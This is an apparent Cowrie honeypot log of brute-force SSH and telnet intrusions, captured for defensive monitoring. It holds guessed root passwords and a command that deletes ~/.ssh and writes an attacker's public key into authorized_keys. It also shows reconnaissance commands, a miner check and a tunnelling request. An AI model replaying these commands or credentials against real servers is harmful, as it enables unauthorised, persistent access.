{"eventid":"cowrie.session.connect","src_ip":"76.53.12.122","src_port":40869,"dst_ip":"1.2.3.4","dst_port":23,"session":"d0e272f0964b","protocol":"telnet","message":"New connection: 76.53.12.122:40869 (1.2.3.4:23) [session: d0e272f0964b]","sensor":"my-vps","timestamp":"2025-08-26T01:30:46.443982Z"}
{"eventid":"cowrie.session.closed","duration":30.76904273033142,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:31:17.212927Z","src_ip":"76.53.12.122","session":"d0e272f0964b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":34418,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c6137aaf903","protocol":"ssh","message":"New connection: 27.112.78.170:34418 (1.2.3.4:22) [session: 9c6137aaf903]","sensor":"my-vps","timestamp":"2025-08-26T01:31:51.116267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:31:51.117671Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:31:51.384184Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.login.success","username":"root","password":"admin2023","message":"login attempt [root/admin2023] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:31:52.494083Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:31:53.083658Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:31:53.084356Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:31:53.085492Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:31:53.353207Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:31:53.906251Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:31:53.906971Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:31:54.177752Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:31:54.178648Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":34434,"dst_ip":"1.2.3.4","dst_port":22,"session":"f86368ecb5e7","protocol":"ssh","message":"New connection: 27.112.78.170:34434 (1.2.3.4:22) [session: f86368ecb5e7]","sensor":"my-vps","timestamp":"2025-08-26T01:31:54.443755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:31:54.444427Z","src_ip":"27.112.78.170","session":"f86368ecb5e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:31:54.711702Z","src_ip":"27.112.78.170","session":"f86368ecb5e7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T01:31:55.821983Z","src_ip":"27.112.78.170","session":"f86368ecb5e7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:31:57.092527Z","src_ip":"27.112.78.170","session":"f86368ecb5e7"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":34448,"dst_ip":"1.2.3.4","dst_port":22,"session":"3375747ed28a","protocol":"ssh","message":"New connection: 27.112.78.170:34448 (1.2.3.4:22) [session: 3375747ed28a]","sensor":"my-vps","timestamp":"2025-08-26T01:31:57.353062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:31:57.354556Z","src_ip":"27.112.78.170","session":"3375747ed28a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:31:57.613671Z","src_ip":"27.112.78.170","session":"3375747ed28a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:31:58.653104Z","src_ip":"27.112.78.170","session":"3375747ed28a"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:31:58.912587Z","src_ip":"27.112.78.170","session":"9c6137aaf903"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:31:58.913847Z","src_ip":"27.112.78.170","session":"3375747ed28a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55002,"dst_ip":"1.2.3.4","dst_port":23,"session":"b83e01ab5a25","protocol":"telnet","message":"New connection: 212.227.235.229:55002 (1.2.3.4:23) [session: b83e01ab5a25]","sensor":"my-vps","timestamp":"2025-08-26T01:32:08.138748Z"}
{"eventid":"cowrie.session.connect","src_ip":"61.230.50.173","src_port":41804,"dst_ip":"1.2.3.4","dst_port":23,"session":"7976622f7c1d","protocol":"telnet","message":"New connection: 61.230.50.173:41804 (1.2.3.4:23) [session: 7976622f7c1d]","sensor":"my-vps","timestamp":"2025-08-26T01:32:08.627529Z"}
{"eventid":"cowrie.session.closed","duration":12.998737096786499,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:32:21.137377Z","src_ip":"212.227.235.229","session":"b83e01ab5a25"}
{"eventid":"cowrie.session.closed","duration":35.38625478744507,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:32:44.013716Z","src_ip":"61.230.50.173","session":"7976622f7c1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":12875,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d27c209dbad","protocol":"ssh","message":"New connection: 212.227.125.160:12875 (1.2.3.4:22) [session: 7d27c209dbad]","sensor":"my-vps","timestamp":"2025-08-26T01:33:37.855721Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:33:37.857194Z","src_ip":"212.227.125.160","session":"7d27c209dbad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13129,"dst_ip":"1.2.3.4","dst_port":22,"session":"4567f2f6b683","protocol":"ssh","message":"New connection: 212.227.125.160:13129 (1.2.3.4:22) [session: 4567f2f6b683]","sensor":"my-vps","timestamp":"2025-08-26T01:33:37.971153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:33:37.972429Z","src_ip":"212.227.125.160","session":"4567f2f6b683"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T01:33:38.088929Z","src_ip":"212.227.125.160","session":"4567f2f6b683"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:33:38.445522Z","src_ip":"212.227.125.160","session":"4567f2f6b683"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T01:33:38.562227Z","session":"4567f2f6b683"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48238,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dd4f93a1958","protocol":"ssh","message":"New connection: 212.227.125.160:48238 (1.2.3.4:22) [session: 4dd4f93a1958]","sensor":"my-vps","timestamp":"2025-08-26T01:34:29.030272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:34:29.031362Z","src_ip":"212.227.125.160","session":"4dd4f93a1958"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:34:29.091077Z","src_ip":"212.227.125.160","session":"4dd4f93a1958"}
{"eventid":"cowrie.login.failed","username":"solana","password":"sol@123","message":"login attempt [solana/sol@123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:34:29.272958Z","src_ip":"212.227.125.160","session":"4dd4f93a1958"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:34:30.335211Z","src_ip":"212.227.125.160","session":"4dd4f93a1958"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:34:47.973017Z","src_ip":"212.227.125.160","session":"4567f2f6b683"}
{"eventid":"cowrie.session.connect","src_ip":"119.197.87.141","src_port":44710,"dst_ip":"1.2.3.4","dst_port":22,"session":"59f0d2983570","protocol":"ssh","message":"New connection: 119.197.87.141:44710 (1.2.3.4:22) [session: 59f0d2983570]","sensor":"my-vps","timestamp":"2025-08-26T01:35:48.263054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-26T01:35:48.264003Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-26T01:35:48.553452Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:35:50.021727Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:35:51.313177Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:35:51.949451Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-26T01:35:51.950131Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-26T01:35:51.950867Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:35:52.241436Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:35:52.881125Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-26T01:35:52.881795Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:35:53.174117Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:35:53.772784Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T01:35:53.773548Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:35:54.064827Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:35:54.739423Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-26T01:35:54.740113Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:35:55.034509Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:35:55.636553Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-26T01:35:55.637228Z","src_ip":"119.197.87.141","session":"59f0d2983570"}
